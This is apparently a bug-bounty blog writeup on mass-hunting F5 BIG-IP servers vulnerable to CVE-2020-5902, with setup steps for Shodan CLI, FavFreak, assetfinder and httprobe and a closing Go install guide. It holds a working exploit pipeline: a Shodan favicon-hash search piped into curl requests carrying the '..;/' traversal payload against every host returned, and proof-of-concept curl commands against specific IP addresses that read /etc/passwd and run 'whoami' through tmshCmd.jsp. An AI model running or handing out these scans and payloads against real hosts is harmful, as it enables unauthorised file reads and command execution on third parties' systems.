CVE-2020–5902 Mass Hunting with shodan and Favfreak

CVE-2020–5902

Google Dork : inurl:/tmui/login.jsp

Hey Guys!! It’s me Anon Tuttu Venus again with another writeup! [Just second one :P]
I knew that this writeup is too late.
But still, I thought about noting down the process I did for finding CVE 2020–5902.

I have done these on my Kali Linux

!!!!!!!!!SPOILER ALERT!!!!!!!!!!

Main Content :

These are the 2 commands which we are going to use.
I will explain to you how to run these commands without an error.

Prerequisites :

Shodan Premium ID required [ API Key ]

Python3 and pip3 and go

Tool Need to be installed :

1. FavFreak
2. Shodan CLI
3. Assetfinder
4. httprobe

FavFreak is a new tool developed by Devansh batham

Writeup: https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
How to Setup Favfreak :

Original: https://github.com/devanshbatham/FavFreak

git clone https://github.com/devanshbatham/FavFreak
cd FavFreak
pip3 install -r requirements.txt

Shodan CLI is a command-line version on Shodan.io
How to install and configure?

1. easy_install shodan
2. shodan init YOUR_API_KEY

Original:https://cli.shodan.io/

Assetfinder is used to grab subdomain developed by @tomnomnom

How to set up assetfinder :

Use go get method, which is the easiest one

go get -u github.com/tomnomnom/assetfinder

httprobe take a list of domains and check for working http and https servers. developed by @tomnomnom

How to set up httprobe:
Use go get method, which is the easiest one

go get -u github.com/tomnomnom/httprobe

Once everything is installed please run the 1st command :

assetfinder -subs-only target.com | httprobe | python3 /root/Tools/FavFreak/favfreak.py -o output —-shodan

/root/Tools: This the directory where I have stored my tools [ This may differ in your case]

Breakdown Commands :

assetfinder -subs-only target.com will find the subdomain

httprobe will check for http and https services

— — shodan will list down the shodan dorks

Once the above command runs successfully we will get an output similar to this :

Now copy each has without [ ] and replace with <input hash> and run the 2nd command

shodan search http.favicon.hash:<input hash> --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui..." | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done

The out of this command will show whether the server is Vulnerable or Not

If the output says it is Vulnerable the ran the POC.

Either you the curl or directly load on the browser.

Curl Command:

curl -sk 'https://52.20.40.40/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
curl -sk 'https://35.226.53.127/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami'

NOTE: There are chances of getting false positives!! && Higher Chance of getting DUPLICATE REPORT!!!!!

Happy Hunting !!

anonvenus is an Information Security Enthusiast

I have seen some people are struggling to set up go on LINUX Machine

Steps to set up GO :

1. Download go from official website https://golang.org/dl/go1.14.4.linux-amd64.tar.gz
2. cd /root/Download [ Assuming this is your download location ]
3. tar -C /usr/local/ -xvf go1.14.4.linux-amd64.tar.gz
4. vim ~/.bashrc
5. export GOPATH=/root/go-workspace
   export GOROOT=/usr/local/go
   PATH=$PATH:$GOROOT/bin/:$GOPATH/bin
6. source ~/.bashrc